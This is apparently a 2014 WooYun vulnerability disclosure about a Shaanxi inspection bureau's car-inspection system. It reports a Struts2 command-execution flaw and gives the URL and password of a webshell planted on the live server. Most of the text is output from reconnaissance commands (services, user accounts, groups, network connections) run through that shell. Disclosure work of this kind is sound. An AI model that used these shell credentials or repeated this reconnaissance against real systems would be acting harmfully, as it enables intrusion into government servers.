漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-069099
漏洞标题:陕西出入境检验检疫局进口汽车登检管理系统存在命令执行及文件上传漏洞
相关厂商:snciq.gov.cn
漏洞作者: 阿海
提交时间:2014-07-20 19:51
修复时间:2014-09-03 19:52
公开时间:2014-09-03 19:52
漏洞类型:命令执行
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-07-20: 细节已通知厂商并且等待厂商处理中
2014-07-25: 厂商已经确认,细节仅向厂商公开
2014-08-04: 细节向核心白帽子及相关领域专家公开
2014-08-14: 细节向普通白帽子公开
2014-08-24: 细节向实习白帽子公开
2014-09-03: 细节向公众公开
简要描述:
陕西出入境检验检疫局进口汽车登检管理系统存在命令执行及文件上传漏洞,整站沦陷,可导致内网渗透,目前己被人挂了多个木马,至今没有修复。
详细说明:
后门地址:http://www.snciq.gov.cn:6198/car/common/file8.jsp
D:\tomcat7\webapps\car\car\common>net start
==============================================================================================================================
ÒѾÆô¶¯ÒÔÏ Windows •þÎñ:
Application Experience Lookup Service
Automatic Updates
COM+ Event System
Computer Browser
Cryptographic Services
DCOM Server Process Launcher
DHCP Client
Distributed Link Tracking Client
Distributed Transaction Coordinator
DNS Client
Error Reporting Service
Event Log
Help and Support
IPSEC Services
Java Quick Starter
Logical Disk Manager
Network Connections
Network Location Awareness (NLA)
OracleDBConsoleorcl
OracleOraDb10g_home1iSQL*Plus
OracleOraDb10g_home1TNSListener
OracleServiceORCL
Plug and Play
Print Spooler
Protected Storage
Remote Procedure Call (RPC)
Remote Registry
Secondary Logon
Security Accounts Manager
Server
Shell Hardware Detection
System Event Notification
Task Scheduler
TCP/IP NetBIOS Helper
Terminal Services
Windows Management Instrumentation
Windows Time
Wireless Configuration
Workstation
D:\tomcat7\webapps\car\car\common>net localgroup
==============================================================================================================================
\\CAR µÄ±ðÃû
-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Distributed COM Users
*Guests
*HelpServicesGroup
*Network Configuration Operators
*ora_dba
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*Remote Desktop Users
*Replicator
*TelnetClients
*Users
D:\tomcat7\webapps\car\car\common>net user
==============================================================================================================================
\\CAR µÄÓû§ÕÊ»§
-------------------------------------------------------------------------------
Administrator Guest jxzz
SUPPORT_388945a0
D:\tomcat7\webapps\car\car\common>netstat -an
==============================================================================================================================
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1056 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1158 0.0.0.0:0 LISTENING
TCP 0.0.0.0:1521 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3938 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5520 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5560 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5580 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1046 0.0.0.0:0 LISTENING
TCP 127.0.0.1:1521 127.0.0.1:3645 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3646 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3647 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3648 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3649 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3653 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3654 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3655 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3657 ESTABLISHED
TCP 127.0.0.1:1521 127.0.0.1:3658 ESTABLISHED
TCP 127.0.0.1:3645 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3646 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3647 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3648 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3649 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3653 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3654 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3655 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3657 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:3658 127.0.0.1:1521 ESTABLISHED
TCP 127.0.0.1:5152 0.0.0.0:0 LISTENING
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING
TCP 192.168.1.8:139 0.0.0.0:0 LISTENING
TCP 192.168.1.8:1230 192.168.1.8:1158 TIME_WAIT
TCP 192.168.1.8:1232 192.168.1.8:1521 TIME_WAIT
TCP 192.168.1.8:1233 192.168.1.8:1521 TIME_WAIT
TCP 192.168.1.8:1234 192.168.1.8:1521 TIME_WAIT
TCP 192.168.1.8:1237 192.168.1.8:1158 TIME_WAIT
TCP 192.168.1.8:1240 192.168.1.8:1158 TIME_WAIT
TCP 192.168.1.8:1521 192.168.1.8:1898 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:1917 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:1918 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:1969 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:2502 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:2503 ESTABLISHED
TCP 192.168.1.8:1521 192.168.1.8:4610 ESTABLISHED
TCP 192.168.1.8:1898 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:1917 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:1918 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:1969 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:2502 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:2503 192.168.1.8:1521 ESTABLISHED
TCP 192.168.1.8:3938 192.168.1.8:1229 TIME_WAIT
TCP 192.168.1.8:3938 192.168.1.8:1231 TIME_WAIT
TCP 192.168.1.8:3938 192.168.1.8:1236 TIME_WAIT
TCP 192.168.1.8:3938 192.168.1.8:1238 TIME_WAIT
TCP 192.168.1.8:3938 192.168.1.8:1241 TIME_WAIT
TCP 192.168.1.8:4610 192.168.1.8:1521 ESTABLISHED
UDP 0.0.0.0:445 *:*
UDP 0.0.0.0:500 *:*
UDP 0.0.0.0:1026 *:*
UDP 0.0.0.0:4500 *:*
UDP 127.0.0.1:123 *:*
UDP 127.0.0.1:1027 *:*
UDP 192.168.1.8:123 *:*
UDP 192.168.1.8:137 *:*
UDP 192.168.1.8:138 *:*
漏洞证明:
木马地址:http://www.snciq.gov.cn:6198/car/common/file8.jsp 密码:shenma
Struts2问题:http://www.snciq.gov.cn:6198/car/login.action
修复方案:
升级struts2版本至2.3.15以上,其它修复方案大家懂的。
版权声明:转载请注明来源 阿海@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2014-07-25 12:17
厂商回复:
CNVD确认并复现所述情况,已经转由CNCERT下发给陕西分中心,由其后续联系网站管理单位处置。按通用软件漏洞评分,rank 10
最新状态:
暂无